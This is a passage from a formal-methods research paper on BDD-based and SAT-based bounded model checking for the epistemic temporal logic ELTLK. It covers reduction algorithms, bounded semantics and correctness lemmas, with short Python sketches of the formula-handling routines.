_{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model; then by \({\mathcal{V }}_M\) we understand the valuation function \(\mathcal{V }\) of the model \(M\), and by \(G_R \subseteq G\) the set of its reachable states. Moreover, we define \([\!\![{M,\varphi }]\!\!] = \{ g\in G_R \mid M,g\models ^\exists \varphi \}\).
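Definitions 1 and 2 are directly computable by structural recursion. The sketch below assumes a hypothetical encoding of formulae as nested Python tuples, e.g. \(p\, \mathrm{U}\, {\overline{\mathrm{{K}}}}_{{ c}}q\) as ('U', ('ap', 'p'), ('K', 'c', ('ap', 'q'))).

```python
def gamma(phi):
    """gamma(phi): the number of nested epistemic operators (Definition 1)."""
    op = phi[0]
    if op in ('ap', 'nap', 'true', 'false'):
        return 0
    if op in ('not', 'X'):
        return gamma(phi[1])
    if op in ('and', 'or', 'U', 'R'):
        return gamma(phi[1]) + gamma(phi[2])
    if op in ('K', 'E', 'D', 'C'):           # the epistemic operators
        return gamma(phi[-1]) + 1
    raise ValueError(op)

def Y_set(phi):
    """Y(phi): the set of epistemic subformulae (Definition 2)."""
    op = phi[0]
    if op in ('ap', 'nap', 'true', 'false'):
        return set()
    if op in ('not', 'X'):
        return Y_set(phi[1])
    if op in ('and', 'or', 'U', 'R'):
        return Y_set(phi[1]) | Y_set(phi[2])
    if op in ('K', 'E', 'D', 'C'):
        return Y_set(phi[-1]) | {phi}
    raise ValueError(op)
```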
3.1.1 Reduction of ELTLK to ELTL Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model, and \(\varphi \) an ELTLK formula. Here, we describe an algorithm for computing the set \([\!\![{M,\varphi }]\!\!]\). The algorithm allows for combining any two methods for computing \([\!\![{M,\varphi }]\!\!]\) for each \(\varphi \) being an ELTL formula, or of the form \(\mathrm{Y}\!p\), where \(p \in \mathcal{PV }\), and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\) (we use the algorithms from [11] and [43], respectively). Algorithm 3 is used to compute the set \([\!\![{M,\varphi }]\!\!]\). In order to obtain this set, we construct a new model \(M'\) together with an ELTL formula \(\varphi '\), as described in Algorithm 3, and compute the set \([\!\![{M', \varphi '}]\!\!]\), which is equal to \([\!\![{M,\varphi }]\!\!]\). Initially \(\varphi '\) equals \(\varphi \), which is an ELTLK formula, and we process the formula in stages to reduce it to an ELTL formula by replacing all its subformulae containing epistemic operators with atomic propositions. We begin by choosing some epistemic subformula \(\psi \) of \(\varphi '\) which contains exactly one epistemic operator, and process it in two stages. First, we modify the valuation function of \(M'\) such that every state initialising some path or run along which \(sub(\psi )\) holds is labelled with the new atomic proposition \(p_{sub(\psi )}\), and we replace every occurrence of \(sub(\psi )\) in \(\psi \) with the variable \(p_{sub(\psi )}\). In the second stage, we deal with the epistemic operators having only atomic propositions in their scopes. By modifying the valuation function of \(M'\), we label with a new variable \(p_{\psi }\) every state initialising some path or run along which the modified simple epistemic formula \(\psi \) holds. Similarly to the previous stage, we replace every occurrence of \(\psi \) in \(\varphi '\) with \(p_{\psi }\). In the subsequent iterations, we process every remaining epistemic subformula of \(\varphi '\) in the same way until there are no more epistemic operators in \(\varphi '\), i.e., until we obtain an ELTL formula \(\varphi '\) and the model \(M'\) with the appropriately modified valuation function. Finally, we compute the set of all reachable states of \(M'\) that initialise at least one path or run along which \(\varphi '\) holds (line 13). The correctness of the substitution used in Algorithm 3 is stated in the following lemma: Lemma 1 Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model over \(\mathcal{PV }\), \(\varphi \) an ELTLK formula, and \(g\in G\) some state of \(M\). We define \(M' = (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V }')\) over \({\mathcal{PV }}' = {\mathcal{PV }} \cup \{ q \}\), where \(q\) is an atomic proposition such that \(q\not \in \mathcal{PV }\), and \(\mathcal{V }'\) is defined as follows: • \(p \in {\mathcal{V }}(g')\) iff \(p \in {\mathcal{V }}'(g')\) for all \(p\in \mathcal{PV }\) and \(g'\in G\), • \(M,g'\models ^\exists \varphi \) iff \(q\in {\mathcal{V }}'(g')\) for all \(g'\in G\). Then, \(M',g\models ^\exists q\) iff \(M,g\models ^\exists \varphi \). Proof (Sketch) The “\(\Rightarrow \)” case follows directly from the definition of \(\mathcal{V }'\). The “\(\Leftarrow \)” case can be demonstrated by induction on the length of the formula \(\varphi \). The base case follows directly for the atomic propositions and their negations. In the inductive step we assume that the lemma holds for all the proper subformulae of \(\varphi \), and use the definition of \(\mathcal{V }'\) and the fact that \(M'\) contains exactly the same paths as \(M\).
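To give the flavour of the reduction, here is a sketch (reusing \(gamma\) and \(Y\_set\) from the sketch above) that collapses the two relabelling stages of Algorithm 3 into one innermost-first substitution; \(label\_with\) is a hypothetical callback that extends the valuation of \(M'\) with a fresh proposition holding exactly in the states initialising a path or run on which \(\psi \) holds (this is what Lemma 1 licenses) and returns that proposition's name.

```python
def substitute(phi, old, new):
    """Replace every occurrence of the subformula `old` in `phi` by `new`."""
    if phi == old:
        return new
    return (phi[0],) + tuple(
        substitute(a, old, new) if isinstance(a, tuple) else a
        for a in phi[1:])

def innermost_epistemic(phi):
    """Some epistemic subformula containing exactly one epistemic operator."""
    for psi in Y_set(phi):
        if gamma(psi) == 1:
            return psi
    return None

def reduce_to_eltl(phi, label_with):
    """Iteratively replace innermost epistemic subformulae by fresh
    propositions until only an ELTL formula remains."""
    while gamma(phi) > 0:
        psi = innermost_epistemic(phi)
        p = label_with(psi)              # relabelling of M' done elsewhere
        phi = substitute(phi, psi, ('ap', p))
    return phi
```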
3.1.2 BMC Algorithm To perform bounded model checking of an ELTLK formula, we use Algorithm 4. Given a model \(M\) and an ELTLK formula \(\varphi \), the algorithm checks if there exists a path or run initialised in \(\iota \) on which \(\varphi \) holds, i.e., if \(M,\iota \models ^\exists \varphi \). For any \(X~\subseteq G\), by \({X}_{\leadsto } \stackrel{def}{=}\{ g' \in G\mid (\exists {g\in X}) (\exists {\rho \in \varPi (g)}) ~g' = \rho (1) \}\) we mean the set of the immediate successors of all the states in \(X\). The algorithm starts with the set \({Reach}\) of reachable states that initially contains only the state \(\iota \). With each iteration the verified formula is checked (line 4), and the set \({Reach}\) is extended with new states (line 8). The algorithm operates on submodels \(M|_{{Reach}}\) generated by the set \({Reach}\) to check if the initial state \(\iota \) is in the set of states from which there is a path or run on which \(\varphi \) holds. The loop terminates if there is such a path or run in the obtained submodel, and the algorithm returns \(\mathsf TRUE \) (line 4). The search continues until no new states can be reached from the states in \({Reach}\). When the full set of reachable states has been obtained and a path or run from the initial state on which \(\varphi \) holds could not be found in any of the obtained submodels, the algorithm terminates with \(\mathsf FALSE \). The correctness of the results obtained by the bounded model checking algorithm is formulated by the following theorem: Theorem 1 Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model, \(\varPi \) a set of paths and runs of \(M\), \(\varphi \) an ELTLK formula, and \(\rho \in \varPi \) a path or run with an evaluation position \(m\) such that \(m \unlhd _\rho length(\rho )\). Then, \(M,\rho [m] \models \varphi \) iff there exists \(G' \subseteq G\) such that \(\iota \in G'\) and \(M{|_{G'}},\rho [m] \models \varphi \). Proof (“\(\Rightarrow \)”) This direction is obvious, as we can simply take \(G' = G\). (“\(\Leftarrow \)”) This direction is more involved; the proof is by induction on the length of the formula \(\varphi \). The base case is straightforward, as the statement follows directly for the propositional variables and their negations. Assume that the statement holds for all the proper subformulae of \(\varphi \). Let \(G' \subseteq G\) be a set of states such that \(M{|_{G'}}\) contains \(\rho \), and (*) let \(m \in \mathrm{I\!N}\) be an evaluation position such that \(M{|_{G'}}, \rho [m] \models \varphi \). 1. Let \(\varphi = \psi _1 \vee \psi _2\). By the semantics and the assumption (*), \(M{|_{G'}},\rho [m] \models \psi _1\) or \(M{|_{G'}},\rho [m] \models \psi _2\). Using the induction hypothesis and the definition of submodel (Definition 3), \(\rho \) exists also in the model \(M\), and \(M,\rho [m] \models \psi _1\) or \(M,\rho [m]\models \psi _2\), thus \(M,\rho [m] \models \psi _1 \vee \psi _2\). 2. Let \(\varphi = \psi _1 \wedge \psi _2\). By the semantics and the assumption (*), \(M{|_{G'}},\rho [m] \models \psi _1\) and \(M{|_{G'}},\rho [m] \models \psi _2\). Using the induction hypothesis and the definition of submodel, \(\rho \) exists also in the model \(M\). Therefore, \(M,\rho [m] \models \psi _1\) and \(M,\rho [m]\models \psi _2\), thus \(M,\rho [m] \models \psi _1 \wedge \psi _2\). 3. Let \(\varphi = \mathrm{X}\psi _1\). By the semantics and the assumption (*), \(length(\rho ) > m\), and \(M{|_{G'}},\rho [m+1] \models \psi _1\). Using the induction hypothesis and the definition of submodel, we get that \(\rho \) exists also in \(M\), and \(M,\rho [m+1] \models \psi _1\), therefore \(M, \rho [m] \models \mathrm{X}\psi _1\). 4. Let \(\varphi = \psi _1 \mathrm{U}\psi _2\). By the semantics and the assumption (*), there exists \(k {\,\geqslant \,}m\) such that \(M{|_{G'}},\rho [k] \models \psi _2\), and \(M{|_{G'}},\rho [j] \models \psi _1\) for all \(m {\,\leqslant \,}j < k\). Using the induction hypothesis and the definition of submodel, we get that \(\rho \) exists also in \(M\). Therefore, from \(M, \rho [k] \models \psi _2\), and \(M, \rho [j] \models \psi _1\) for all \(m {\,\leqslant \,}j < k\), it follows that \(M,\rho [m] \models \psi _1 \mathrm{U}\psi _2\). 5. Let \(\varphi = \psi _1 \mathrm{R}\psi _2\). By the semantics and the assumption (*) we have one or both of the following cases: (a) \(\rho \) is a run of \(M{|_{G'}}\) and \(M{|_{G'}}, \rho [k] \models \psi _2\) for all \(k {\,\geqslant \,}m\); then from the definition of submodel, \(\rho \) exists also in \(M\), and \(\rho \in \varPi ^\omega \).
Using the induction hypothesis, we have that \(M, \rho [k] \models \psi _2\) for all \(k {\,\geqslant \,}m\). Therefore, it follows that \(M, \rho [m] \models \psi _1 \mathrm{R}\psi _2\). (b) There exists \(k {\,\geqslant \,}m\) such that \(M{|_{G'}}, \rho [k] \models \psi _1\), and \(M{|_{G'}},\rho [j] \models \psi _2\) for all \(m {\,\leqslant \,}j {\,\leqslant \,}k\). From the definition of submodel, \(\rho \) also exists in \(M\), and using the induction hypothesis we get that \(M, \rho [k] \models \psi _1\), and \(M, \rho [j] \models \psi _2\) for all \(m {\,\leqslant \,}j {\,\leqslant \,}k\). Thus, \(M,\rho [m] \models \psi _1 \mathrm{R}\psi _2\). 6. Let \({ c}\in \mathcal{A }\) and \(\varphi = {\overline{\mathrm{{K}}}}_{ c}\psi _1\). By the semantics and the assumption (*), there exists a path or run \(\rho '\) in \(M{|_{G'}}\) such that \(\rho '(k) \sim _{ c}\rho (m)\) for some \(k {\,\geqslant \,}0\), and \(M{|_{G'}}, \rho '[k] \models \psi _1\). From the definition of submodel, \(\rho \) and \(\rho '\) also exist in \(M\). Using the induction hypothesis, we get that \(M, \rho '[k] \models \psi _1\) and \(\rho '(k) \sim _{ c}\rho (m)\). Thus, \(M, \rho [m] \models {\overline{\mathrm{{K}}}}_{ c}\psi _1\). 7. Let \(\varGamma \subseteq \mathcal{A }\) and \(\varphi = \overline{\mathrm{Y}}_\varGamma \psi _1\), where \(\mathrm{Y}\in \{ \mathrm{{D}}, \mathrm{E}, \mathrm{{C}}\}\). By the semantics and the assumption (*), there exists a path or run \(\rho '\) in \(M{|_{G'}}\) such that \(\rho '(k) \sim _\varGamma ^\mathrm{Y}\rho (m)\) for some \(k {\,\geqslant \,}0\), and \(M{|_{G'}}, \rho '[k] \models \psi _1\). From the definition of submodel, \(\rho \) and \(\rho '\) also exist in \(M\). Using the induction hypothesis, we get that \(M, \rho '[k] \models \psi _1\) and \(\rho '(k) \sim _\varGamma ^\mathrm{Y}\rho (m)\). Thus, \(M, \rho [m] \models \overline{\mathrm{Y}}_\varGamma \psi _1\). 3.1.3 Model Checking ELTL In Algorithm 3, to compute the sets of states in which ELTL formulae hold, it is possible to use any method that computes the set \([\!\![{M,\varphi }]\!\!]\) for \(\varphi \) being an ELTL formula. The method described in [11] uses a tableau construction for which many improvements have been proposed, e.g., [15, 18, 19, 45], but for the purpose of implementing a complete solution for the BDD-based bounded model checking of ELTLK, we use the basic symbolic model checking method of [11]. This method is based on checking the non-emptiness of Büchi automata. Given a model \(M\) and an ELTL formula \(\varphi \), we begin with constructing the tableau for \(\varphi \) (as described in [11]), which is then combined with \(M\) to obtain their product, which contains those runs of \(M\) where \(\varphi \) potentially holds. Next, the product is verified in terms of the CTL model checking of the formula \(\mathrm{E}\mathrm{G}{true}\) under fairness constraints. Those constraints, corresponding to sets of states, allow us to choose only the runs of the model along which at least one state in each set representing the fairness constraints appears in a cycle. In the case of ELTL model checking, fairness guarantees that \(\varphi \mathrm{U}\psi \) really holds, i.e., it eliminates the runs where \(\varphi \) holds continuously but \(\psi \) never holds. Finally, we choose only those reachable states of the product that belong to some particular set of states computed for the formula.
The corresponding states of the verified system that are in this set comprise the set \([\!\![{M, \varphi }]\!\!]\), i.e., the reachable states where the verified formula holds. For more details, we refer the reader to [11]. The method described above has some limitations when used for bounded model checking, where it is preferable to detect counterexamples using not only the runs but also the paths of the submodel. As totality of the transition relation of the verified model is assumed, counterexamples are found only along the runs of the model. However, the method remains correct even if only the final submodel has a total transition relation: in the worst case the detection of the counterexample is delayed to the last iteration, i.e., when all the reachable states have been computed. Nonetheless, this should not keep us from assessing the potential efficiency of our approach. 3.1.4 Model checking epistemic modalities In the case of the formulae of the form \(\mathrm{Y}p\), where \(p \in \mathcal{PV }\), and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\), for implementation purposes we use the algorithms described in [43]. The procedures follow directly from the semantics of ELTLK. The algorithm for \({\overline{\mathrm{{C}}}}_\varGamma \) involves a fixpoint computation, whereas for the remaining operators the algorithms are based on simple non-iterative computations. 3.2 SAT-based Approach In this section we present two SAT-based BMC methods for ELTLK: the first one is defined for interleaved interpreted systems, while the second one is defined for interpreted systems. The main difference between the two methods is in the propositional encoding of the transition relation of the model under consideration. In SAT-based BMC we construct a propositional formula that is satisfiable if and only if there exists a finite set of paths of the underlying model that is a solution to the existential model checking problem. In order to construct the propositional formula, we first need to define the bounded semantics for the underlying logic (in our case, for ELTLK), then to encode this semantics by means of a propositional formula, and finally to represent a part of the model by a propositional formula. The bounded semantics and the encoding for ELTLK presented in this section are based on the semantics and encoding of [55] for the temporal fragment and of [52] for the epistemic fragment of ELTLK. This bounded semantics differs from the bounded semantics for ELTLK defined in [42] in the definition of the \(k\)-path, which allows us to replace the two separate bounded semantics, for \(k\)-paths that are loops and for \(k\)-paths that do not need to be loops, with one bounded semantics that is simpler and more elegant, and that results in a more efficient translation of the bounded model checking problem to the SAT problem. The propositional formula that encodes the bounded semantics for ELTLK is independent of the type of the considered model, i.e., the encoding is the same for both the interpreted systems and the interleaved interpreted systems. This encoding differs from the one defined in [42] in the definition of the looping condition, and in using appropriately chosen subsets of symbolic paths to encode the subformulae of the formula in question.
We start with presenting the definition of the bounded semantics for ELTLK and showing that the bounded and unbounded semantics are equivalent. Then, we show a translation of the existential model checking problem for ELTLK to the propositional satisfiability problem. Finally, we prove the correctness and completeness of the translation to SAT. 3.2.1 Bounded semantics for ELTLK Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model defined for either IIS or IS, and \(k \in \mathrm{I\!N}\) a bound. A \(k\)-path is a pair \((\rho , l)\), also denoted by \(\rho _l\), where \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), and \(\rho \) is a finite sequence \( \rho = (g_{0}, \ldots , g_{k})\) of states such that \((g_{j}, g_{j+1}) \in T\) for each \(0{\,\leqslant \,}j < k \). A \(k\)-path \(\rho _l\) is a loop if \(l < k\) and \(\rho (k) = \rho (l)\). By \({\varPi _k}(g)\) we denote the set of all the \(k\)-paths \(\rho _l\) with \(\rho (0) = g\). If a \(k\)-path \(\rho _l\) is a loop, then it represents the run of the form \(uv^{\omega }\), where \(u=(\rho (0),\ldots ,\rho (l))\) and \(v=(\rho (l+1),\ldots ,\rho (k))\). We denote this unique run by \(\varrho (\rho _l)\). To illustrate the notions of \(k\)-paths and loops, consider the model shown in Fig. 7. Observe that the pairs \(\rho _0 = ((g_0, g_1, g_0, g_2, g_0), 0)\), \(\rho _1 = ((g_0, g_1, g_0, g_2, g_0), 1)\), \(\rho _2 = ((g_0, g_1, g_0, g_2, g_0), 2)\), \(\rho _3 = ((g_0, g_1, g_0, g_2, g_0), 3)\), and \(\rho _4 = ((g_0, g_1, g_0, g_2, g_0), 4)\) are \(k\)-paths for \(k = 4\), and that only \(\rho _0\) and \(\rho _2\) are loops. Observe also that the \(k\)-path \(\rho _2\) represents the following run: \((g_0, g_1, g_0)(g_2, g_0)^{\omega } = (g_0, g_1, g_0, g_2, g_0, g_2, g_0, g_2,\ldots )\).
Fig. 7 A model. We assume that we have one agent that has three states: \(g_0\), \(g_1\) and \(g_2\). The state \(g_0\) is initial, and the epistemic relation is \(\{(g_0 \sim g_0),(g_1 \sim g_1),(g_2 \sim g_2)\}\)
As the definition of the semantics requires the satisfiability relation to be defined on suffixes of \(k\)-paths, we denote by \(\rho _l[m]\) the \(k\)-path \(\rho _l\) together with the designated starting point \(m\), where \(0 {\,\leqslant \,}m {\,\leqslant \,}k\).
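These notions are easy to make concrete. The following minimal Python sketch (with states as strings and hypothetical helper names) checks the loop condition and unrolls the run \(uv^{\omega }\) represented by a loop, reproducing the \(k\)-path \(\rho _2\) of Fig. 7.

```python
def is_loop(rho, l):
    """A k-path (rho, l) is a loop iff l < k and rho(k) = rho(l)."""
    k = len(rho) - 1
    return l < k and rho[k] == rho[l]

def run_prefix(rho, l, n):
    """First n states of the run u v^omega represented by a loop (rho, l),
    with u = rho(0..l) and v = rho(l+1..k)."""
    k = len(rho) - 1
    u, v = rho[:l + 1], rho[l + 1:k + 1]
    out = list(u)
    while len(out) < n:
        out.extend(v)
    return out[:n]

# The k-paths of Fig. 7 for k = 4:
rho = ["g0", "g1", "g0", "g2", "g0"]
assert is_loop(rho, 2) and not is_loop(rho, 1)
assert run_prefix(rho, 2, 9) == ["g0", "g1", "g0", "g2", "g0", "g2", "g0", "g2", "g0"]
```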
Definition 4 (Bounded semantics) Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model defined for either IIS or IS, \(k {\,\geqslant \,}0\) a bound, and \(\varphi \) an ELTLK formula. The formula \(\varphi \) is \(k\)-true along the \(k\)-path \(\rho _l\) (in symbols \(M,\rho _l \models _k \varphi \)) iff \(M, \rho _l[0] \models _k \varphi \), where $$\begin{aligned} \begin{array}{l@{\quad }l} M, \rho _l[m] \models _k {{true}}, &{} \\ M, \rho _l[m] \not \models _k {false}, &{} \\ M,\rho _l[m] \models _{k} p \text { iff } &{} p \in {\mathcal{V }}(\rho (m)),\\ M,\rho _l[m] \models _{k} \lnot p \text { iff } &{} p \not \in {\mathcal{V }}(\rho (m)),\\ M,\rho _l[m] \models _{k} \varphi \vee \psi \text { iff } &{} M,\rho _l[m] \models _k \varphi \text { or } M,\rho _l[m] \models _k \psi ,\\ M,\rho _l[m] \models _k \varphi \wedge \psi \text { iff } &{} M,\rho _l[m] \models _k \varphi \text { and } M,\rho _l[m] \models _k \psi ,\\ M,\rho _l[m] \models _k \mathrm{X}\varphi \text { iff } &{} (m<k \text { and } M,\rho _l[m+1] \models _k \varphi ) \text { or }\\ &{}(m=k \text { and } l < k \text { and } \rho (k) = \rho (l) \text { and } M,\rho _l[l+1] \models _k \varphi ),\\ M,\rho _l[m] \models _k \varphi \mathrm{U}\psi \text { iff } &{} (\exists m {\,\leqslant \,}i{\,\leqslant \,}k) (M,\rho _l[i] \models _k \psi \text { and }(\forall m {\,\leqslant \,}j < i) M,\rho _l[j] \models _k \varphi )\\ &{}\text { or }(\rho (k) = \rho (l)\text { and } l < m \text { and }(\exists l < i < m) (M,\rho _l[i] \models _k \psi \\ &{}\text { and }(\forall m \!{\,\leqslant \,}\! j {\,\leqslant \,}k) M,\rho _l[j] \models _k \varphi \text { and } (\forall l \!{\,\leqslant \,}\! j < i) M,\rho _l[j] \models _k \varphi )),\\ M,\rho _l[m] \models _k \varphi \mathrm{R}\psi \text { iff } &{} (\rho (k) = \rho (l)\text { and } l<k \text { and } (\forall min(l,m) {\,\leqslant \,}i {\,\leqslant \,}k)\, M,\rho _l[i] \models _k \psi )\text { or } \\ &{}(\exists m {\,\leqslant \,}i {\,\leqslant \,}k) (M,\rho _l[i] \models _k \varphi \text { and } (\forall m {\,\leqslant \,}j {\,\leqslant \,}i) M,\rho _l[j] \models _k \psi )\text { or }\\ &{}(\rho (k) = \rho (l)\text { and } l < m \text { and } (\exists l < i < m) (M,\rho _l[i] \models _k \varphi \text { and }\\ &{}(\forall m {\,\leqslant \,}j {\,\leqslant \,}k) M,\rho _l[j] \models _k \psi \text { and } (\forall l {\,\leqslant \,}j {\,\leqslant \,}i) M,\rho _l[j] \models _k \psi )),\\ M,\rho _l[m] \models _k {\overline{\mathrm{{K}}}}_{{ c}} \varphi \text { iff } &{} (\exists \rho '_{l'} \in {\varPi _k}(\iota )) (\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k}) (M, \rho '_{l'}[j] \models _k \varphi \text { and } \rho (m) \sim _{{ c}} \rho '(j)),\\ M,\rho _l[m] \models _k \overline{Y}_{\varGamma }\varphi \text { iff } &{} (\exists \rho '_{l'} \in {\varPi _k}(\iota )) (\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k}) (M, \rho '_{l'}[j] \models _{k} \varphi \text { and } \rho (m) \sim ^Y_{\varGamma } \rho '(j)),\\ &{}\text { where } Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}. \\ \end{array} \end{aligned}$$ We use the following notation: \(M \models ^{\exists }_{k} \varphi \) iff \(M,\rho _l \models _k \varphi \) for some \(\rho _l \in {\varPi _k}(\iota )\). The SAT-based bounded model checking problem consists in finding out whether there exists \(k \in \mathrm{I\!N}\) such that \(M \models ^{\exists }_k \varphi \).
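The bounded semantics can be executed directly. The sketch below transcribes the propositional, \(\mathrm{X}\) and \(\mathrm{U}\) cases of Definition 4 for formulae given as nested tuples (the same hypothetical encoding as in the earlier sketches); \(labels\) maps each state to its set of propositions, and the closing example evaluates \(p\,\mathrm{U}\,q\) on the loop \(\rho _2\) of Fig. 7 under an assumed labelling.

```python
def bounded_sat(rho, l, m, k, phi, labels):
    """Definition 4, restricted to the propositional, X and U cases."""
    op = phi[0]
    if op == 'ap':
        return phi[1] in labels[rho[m]]
    if op == 'nap':                      # negated proposition (NNF)
        return phi[1] not in labels[rho[m]]
    if op == 'X':
        if m < k:
            return bounded_sat(rho, l, m + 1, k, phi[1], labels)
        # at the end of the k-path, follow the loop back to position l+1
        return (l < k and rho[k] == rho[l]
                and bounded_sat(rho, l, l + 1, k, phi[1], labels))
    if op == 'U':
        a, b = phi[1], phi[2]
        sat = lambda i, f: bounded_sat(rho, l, i, k, f, labels)
        # first disjunct: b at some i in [m, k], a everywhere before it
        if any(sat(i, b) and all(sat(j, a) for j in range(m, i))
               for i in range(m, k + 1)):
            return True
        # wrap-around disjunct for loops (rho(k) = rho(l) and l < m)
        return (rho[k] == rho[l] and l < m and any(
            sat(i, b) and all(sat(j, a) for j in range(m, k + 1))
            and all(sat(j, a) for j in range(l, i))
            for i in range(l + 1, m)))
    raise ValueError('unsupported operator: %s' % op)

labels = {"g0": {"p"}, "g1": {"p"}, "g2": {"q"}}    # assumed labelling
rho = ["g0", "g1", "g0", "g2", "g0"]                # the loop rho_2 of Fig. 7
print(bounded_sat(rho, 2, 0, 4, ('U', ('ap', 'p'), ('ap', 'q')), labels))  # True
```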
Let \(m\) be a formula evaluation position, \(k\) a bound, and \(p,q \in \mathcal{PV }\). An illustration of the bounded semantics is shown in Figs. 8, 9, 10, 11, 12.
Fig. 8 Evaluation of formulae of the Next state type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\)
Fig. 9 Evaluation of formulae of the Until type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\)
Fig. 10 Evaluation of formulae of the Release type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\)
Fig. 11 Evaluation of formulae of the Release type. The highlighted states are the same, i.e. \(\rho _l(l)=\rho _l(k)\)
Fig. 12 Evaluation of existential epistemic formulae. The highlighted states are epistemically equivalent
3.2.2 Equivalence of the bounded and unbounded semantics Now, we show that for some particular bound the bounded semantics is equivalent to the unbounded semantics. Lemma 2 Let \(M\) be a model, \(\varphi \) an ELTLK formula, \(k>0\) a bound, \(\rho _l\) a \(k\)-path in \(M\), and \(0{\,\leqslant \,}m {\,\leqslant \,}k\). The following implication holds: \(M,\rho _l[m] \models _k \varphi \) implies 1. if \(\rho _l\) is not a loop, then \(M, \pi [m] \models \varphi \) for each run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \). 2. if \(\rho _l\) is a loop, then \(M, \varrho (\rho _l)[m] \models \varphi \). Proof (Induction on the length of \(\varphi \)) The lemma follows directly for the propositional variables and their negations. Consider \(\varphi \) to be of the following form: 1. Let \(\varphi =\psi _1 \vee \psi _2 \mid \psi _1 \wedge \psi _2 \mid \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\). By the induction hypothesis; see Lemma 2.1 of [55]. 2. Let \(\varphi = {\overline{\mathrm{{K}}}}_{{ c}}\psi \). From \(M, \rho _l[m] \models _{k} \varphi \) it follows that \((\exists \rho '_{l'} \in {\varPi _k}(\iota ))(\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})\,({M,\rho '_{l'}}[j] \models _k \psi \) and \(\rho (m) \sim _{{ c}} \rho '(j))\). Assume first that neither \(\rho _l\) nor \(\rho '_{l'}\) is a loop. By the inductive hypothesis, for every run \(\pi '\) in \(M\) such that \(\pi '[..k] = \rho '\), \((\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})(M,\pi '[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \pi '(j))\). Further, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \), we have that \(\pi (m) \sim _{{ c}} \rho '(j)\). Thus, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \), \(M, \pi [m] \models \varphi \). Now assume that \(\rho '_{l'}\) is not a loop and \(\rho _l\) is a loop. By the inductive hypothesis, for every run \(\pi '\) in \(M\) such that \(\pi '[..k] = \rho '\), \((\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k}) (M,\pi '[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \pi '(j))\). Further, observe that \(\varrho (\rho _l)(m)=\rho (m)\), thus \(M, \varrho (\rho _l)[m] \models \varphi \). Now assume that both \(\rho _l\) and \(\rho '_{l'}\) are loops. By the inductive hypothesis, \((\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})\)\(({M,\varrho (\rho '_{l'})}[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \varrho (\rho '_{l'})(j))\). Further, observe that \(\varrho (\rho _l)(m)=\rho (m)\), thus \(M, \varrho (\rho _l)[m] \models \varphi \). Finally, assume that \(\rho '_{l'}\) is a loop and \(\rho _l\) is not a loop. By the inductive hypothesis, \((\exists {0 {\,\leqslant \,}j {\,\leqslant \,}k})(M,\varrho (\rho '_{l'})[j] \models \psi \) and \(\rho (m) \sim _{{ c}} \varrho (\rho '_{l'})(j))\). Further, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \), we have that \(\pi (m) \sim _{{ c}} \varrho (\rho '_{l'})(j)\). Thus, for every run \(\pi \) in \(M\) such that \(\pi [..k] = \rho \), \(M, \pi [m] \models \varphi \).
3. Let \(\varphi =\overline{Y}_{\varGamma }\psi \), where \(Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}\). These cases can be proven analogously to case 2. Lemma 3 (Theorem 3.1 of [5]) Let \(M\) be a model, \(\alpha \) an LTL formula, and \(\rho \) a run. Then, the following implication holds: \(M, \rho \models \alpha \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k \alpha \) with \(\rho [..k] = \pi \). Lemma 4 Let \(M\) be a model, \(\alpha \) an LTL formula, \(Y \in \{{\overline{\mathrm{{K}}}}_{{ c}}, {\overline{\mathrm{{D}}}}_{\varGamma }, {\overline{\mathrm{E}}}_{\varGamma }, {\overline{\mathrm{{C}}}}_{\varGamma }\}\), and \(\rho \) a run. Then, the following implication holds: \(M,\rho \models Y\alpha \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k Y\alpha \) with \(\rho [..k] = \pi \). Proof Let \(X^j\) denote the next-time operator applied \(j\) times, i.e., \(X^j = \underbrace{X\ldots X}_{j}\). 1. Let \(Y = {\overline{\mathrm{{K}}}}_{{ c}}\). Then \(M,\rho \models {\overline{\mathrm{{K}}}}_{{ c}}\alpha \) iff \(M,\rho [0] \models {\overline{\mathrm{{K}}}}_{{ c}}\alpha \) iff \((\exists \rho ' \in \varPi (\iota ))\)\((\exists j{\,\geqslant \,}0)[\rho '(j) \sim _{{ c}} \rho (0)\) and 